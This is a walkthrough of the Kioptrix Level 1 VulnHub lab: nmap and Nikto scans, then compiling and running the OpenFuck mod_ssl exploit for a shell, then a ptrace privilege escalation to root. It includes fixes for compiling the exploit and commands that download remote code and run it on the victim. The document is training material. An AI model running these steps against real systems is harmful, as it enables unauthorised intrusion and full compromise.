Tango Down (Kioptrix1) : Kioptrix Level 1 (#1) Challenge Walkthrough


Lab Environment :

Victim Host : https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ on VirtualBox
Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below

Discovery : Changed the VM's network setting to host-only, then ran an nmap scan

root@kali:~/tools/practice/bash/lab# nmap -sT 192.168.56.1-254

Starting Nmap 6.47 ( http://nmap.org ) at 2015-10-27 23:09 GMT
Nmap scan report for 192.168.56.1
Host is up (0.0036s latency).
All 1000 scanned ports on 192.168.56.1 are closed
MAC Address: 0A:00:27:00:00:00 (Unknown)

Nmap scan report for 192.168.56.100
Host is up (0.00012s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:BD:93:7E (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101
Host is up (0.0016s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
139/tcp open netbios-ssn
32768/tcp open filenet-tms
MAC Address: 08:00:27:96:FA:49 (Cadmus Computer Systems)

Nmap scan report for 192.168.56.110
Host is up (0.00030s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh

Nmap done: 254 IP addresses (4 hosts up) scanned in 15.41 seconds

Additional Scan

root@kali:~/tools/practice/bash/lab# nmap -v -sS -sV -O 192.168.56.101

Starting Nmap 6.47 ( http://nmap.org ) at 2015-10-27 23:14 GMT
NSE: Loaded 29 scripts for scanning.
Initiating ARP Ping Scan at 23:14
Scanning 192.168.56.101 [1 port]
Completed ARP Ping Scan at 23:14, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:14
Completed Parallel DNS resolution of 1 host. at 23:14, 0.02s elapsed
Initiating SYN Stealth Scan at 23:14
Scanning 192.168.56.101 [1000 ports]
Discovered open port 443/tcp on 192.168.56.101
Discovered open port 139/tcp on 192.168.56.101
Discovered open port 22/tcp on 192.168.56.101
Discovered open port 111/tcp on 192.168.56.101
Discovered open port 80/tcp on 192.168.56.101
Discovered open port 32768/tcp on 192.168.56.101
Completed SYN Stealth Scan at 23:14, 0.34s elapsed (1000 total ports)
Initiating Service scan at 23:14
Scanning 6 services on 192.168.56.101
Completed Service scan at 23:14, 12.08s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.101
NSE: Script scanning 192.168.56.101.
Initiating NSE at 23:14
Completed NSE at 23:14, 0.04s elapsed
Nmap scan report for 192.168.56.101
Host is up (0.00031s latency).
Not shown: 994 closed ports

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: 9DMYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
32768/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:96:FA:49 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.005 days (since Tue Oct 27 23:08:14 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=195 (Good luck!)
IPID Sequence Generation: All zeros

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.50 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1018 (41.493KB)

So some vectors we see from above are :
  • SSH Server
  • Web Server (http,https)
  • Samba Server
  • NFS Server, Portmapper(111)

Tried accessing the web server:

Seems like a Red Hat server.

Let's run some Nmap NSE scripts:

-- Tried the HTTP NSE scripts - no results
-- Tried the SMB NSE scripts, including smb-vulns-scan -- nothing interesting


Vulnerability Assessment and Exploit :
Run Nikto:

root@kali:~/vulhub/kioptrix1.0# nikto -h 192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-27 23:33:56 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 04:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 10 error(s) and 18 item(s) reported on remote host
+ End Time: 2015-10-27 23:40:54 (GMT0) (418 seconds)
---------------------------------------------------------------------------
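
A defender can turn the version thresholds Nikto printed above into a repeatable banner check that works on both the `Server:` header and the `nmap -sV` line. This is an added example, not part of the original walkthrough; the rule table uses only the thresholds quoted in the Nikto output, and `PATCHED` is a constructed banner.

```python
import re

# Version thresholds copied from the Nikto findings on this page.
# (component, operator, version, required branch, reference)
RULES = [
    ("apache", "<", (1, 3, 27), (1, 3), "CAN-2002-0839"),
    ("apache", "<", (1, 3, 29), (1, 3), "CAN-2003-0542"),
    ("mod_ssl", "<=", (2, 8, 7), None, "CVE-2002-0082"),
]

TOKEN = re.compile(r"\b([A-Za-z_]+)/(\d+(?:\.\d+)+)")        # Apache/1.3.20, mod_ssl/2.8.4
NMAP_APACHE = re.compile(r"\bApache httpd (\d+(?:\.\d+)+)")  # nmap -sV wording


def to_tuple(ver):
    return tuple(int(p) for p in ver.split("."))


def parse_components(banner):
    """Return {lowercase component name: version tuple} found in a banner."""
    found = {name.lower(): to_tuple(ver) for name, ver in TOKEN.findall(banner)}
    m = NMAP_APACHE.search(banner)
    if m:
        found["apache"] = to_tuple(m.group(1))
    return found


def audit_banner(banner):
    """Return the sorted references whose version rule matches the banner."""
    comps = parse_components(banner)
    hits = []
    for name, op, limit, branch, ref in RULES:
        ver = comps.get(name)
        if ver is None or (branch and ver[:len(branch)] != branch):
            continue
        if (op == "<" and ver < limit) or (op == "<=" and ver <= limit):
            hits.append(ref)
    return sorted(hits)


# Banners as printed in the Nikto and nmap output on this page.
NIKTO_BANNER = "Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b"
NMAP_LINE = ("443/tcp open ssl/http Apache httpd 1.3.20 "
             "((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)")
PATCHED = "Apache/1.3.29 (Unix) mod_ssl/2.8.16 OpenSSL/0.9.7c"  # constructed sample

if __name__ == "__main__":
    for b in (NIKTO_BANNER, NMAP_LINE, PATCHED):
        print(audit_banner(b) or "no rule matched", "<-", b)
```

A banner match is only a lead: distributions backport fixes without changing the advertised version, so confirm against the installed package before closing or escalating a finding.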

Found some vulnerabilities as above. Search for CVE-2002-0082 and you will get the below link :

https://www.exploit-db.com/exploits/764/

Once you download this, you need to compile and run it:

root@kali:~/vulhub/kioptrix1.0# ls
764.c http-nse.txt smb-nse.txt

root@kali:~/vulhub/kioptrix1.0# gcc 764.c -o openfk
764.c:651:2: error: unknown type name ‘RC4_KEY’
764.c:652:2: error: unknown type name ‘RC4_KEY’
764.c: In function ‘read_ssl_packet’:
764.c:844:7: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c:844:7: note: each undeclared identifier is reported only once for each function it appears in
764.c: In function ‘send_ssl_packet’:
764.c:882:2: error: unknown type name ‘MD5_CTX’
764.c:887:23: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c: In function ‘get_server_hello’:
764.c:1009:2: warning: passing argument 2 of ‘d2i_X509’ from incompatible pointer type [enabled by default]
In file included from /usr/include/openssl/ssl.h:156:0,
from 764.c:20:
/usr/include/openssl/x509.h:840:1: note: expected ‘const unsigned char **’ but argument is of type ‘unsigned char **’
764.c: In function ‘generate_key_material’:
764.c:1106:2: error: unknown type name ‘MD5_CTX’
764.c:1111:42: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c: In function ‘generate_session_keys’:
764.c:1127:23: error: ‘RC4_KEY’ undeclared (first use in this function)
764.c:1127:31: error: expected expression before ‘)’ token
764.c:1131:32: error: expected expression before ‘)’ token

You will very likely get the above errors while compiling. After hours of searching I found the link below, which helps in fixing the problem... (I so wish I knew C programming)

http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/

Here are the steps to make this work :

1) Add these headers (they declare the RC4_KEY and MD5_CTX types the compiler reported as unknown) :

#include <openssl/rc4.h>
#include <openssl/md5.h>

2) Update the URL of the C file.

Search for wget and replace the URL with this new one :
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

3) Get the libssl-dev library

Install it : apt-get install libssl-dev

4) Update declaration of variables

Line 961, change : unsigned char *p, *end;
By adding const : const unsigned char *p, *end;

5) Compile the code and you’re done

To compile :
gcc -o OpenFuck 764.c -lcrypto

root@kali:~/vulhub/kioptrix1.0# gcc openfk.c -o openfk -lcrypto

root@kali:~/vulhub/kioptrix1.0# ls -l
total 140
-rw-r--r-- 1 root root 33617 Oct 27 23:39 764.c
-rw-r--r-- 1 root root 2289 Oct 27 23:23 http-nse.txt
-rwxr-xr-x 1 root root 60991 Oct 27 23:47 openfk
-rw-r--r-- 1 root root 33684 Oct 27 23:46 openfk.c
-rw-r--r-- 1 root root 351 Oct 27 23:24 smb-nse.txt
root@kali:~/vulhub/kioptrix1.0# ./openfk

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./openfk target box [port] [-c N]

target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)
++++ Truncated++++++++++++++++++

Now for the targets: the closest matches for the version nmap reported are the two below
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2

nmap output : 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)


Running the exploit
root@kali:~/vulhub/kioptrix1.0# ./openfk 0x6a 192.168.56.101 443 -c 50
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
Good Bye!

0x6a did not give us a shell, let's try the other one... 0x6b



root@kali:~/vulhub/kioptrix1.0# ./openfk 0x6b 192.168.56.101 443 -c 50

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--23:51:51-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80...
dl.packetstormsecurity.net: Host not found.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./p: No such file or directory
bash-2.05$
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$ hostname
hostname
kioptrix.level1
bash-2.05$ uname -a
uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
bash-2.05$ cat /etc/release
cat /etc/release
cat: /etc/release: No such file or directory
bash-2.05$ cat /etc/issue
cat /etc/issue
Welcome to Kioptrix Level 1 Penetration and Assessment Environment

--The object of this game:
|_Acquire "root" access to this machine.

There are many ways this can be done, try and find more then one way to
appreciate this exercise.

DISCLAIMER: Kioptrix is not resposible for any damage or instability
caused by running, installing or using this VM image.
Use at your own risk.

WARNING: This is a vulnerable system, DO NOT run this OS in a production
environment. Nor should you give this system access to the outside world
(the Internet - or Interwebs..)

Good luck and have fun!

bash-2.05$ Good Bye!

Now we are in and have a shell. Time for escalating our privileges.

Privilege Escalation
When we run the above exploit, it tries to download ptrace-kmod.c to give us a root shell; however, that doesn't happen.

exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--23:51:51-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'

What we can do is manually download this file to your host :

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Once you download it, compile it. When I compile it on my Kali node, below is what I get:

root@kali:~/vulhub/kioptrix1.0# gcc 895.c -o privesc1
895.c:80:1: warning: missing terminating " character [enabled by default]
895.c:80:1: error: missing terminating " character
895.c:81:1: error: stray ‘\’ in program
895.c:81:1: error: stray ‘\’ in program
895.c:81:2: error: ‘x00’ undeclared here (not in a function)
895.c:81:6: error: expected ‘,’ or ‘;’ before ‘x00’
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program

This is full of errors, probably because of the newer compiler version. What I did was download this C file from my attacking node to the victim node and compile it on that node itself, as it has an older version. After compiling, I ran the binary.

bash-2.05$ wget http://192.168.56.110/ptrace-kmod.c

wget http://192.168.56.110/ptrace-kmod.c
--00:05:36-- http://192.168.56.110/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 192.168.56.110:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

0K ... 100% @ 3.74 MB/s

00:05:36 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

bash-2.05$ ls
ls
895.c
ptrace-kmod.c
bash-2.05$ gcc ptrace-kmodc -o ptrace
gcc ptrace-kmodc -o ptrace
gcc: ptrace-kmodc: No such file or directory
gcc: No input files
bash-2.05$ gcc ptrace-kmodc.c -o ptrace
gcc ptrace-kmodc.c -o ptrace
gcc: ptrace-kmodc.c: No such file or directory
gcc: No input files
bash-2.05$ gcc ptrace-kmod.c -o ptrace
gcc ptrace-kmod.c -o ptrace
bash-2.05$ ls
ls
895.c
ptrace
ptrace-kmod.c
bash-2.05$ chmod +x ptrace
chmod +x ptrace
bash-2.05$ ./ptrace
./ptrace
[+] Attached to 6416
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...


id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


We are now root on the node.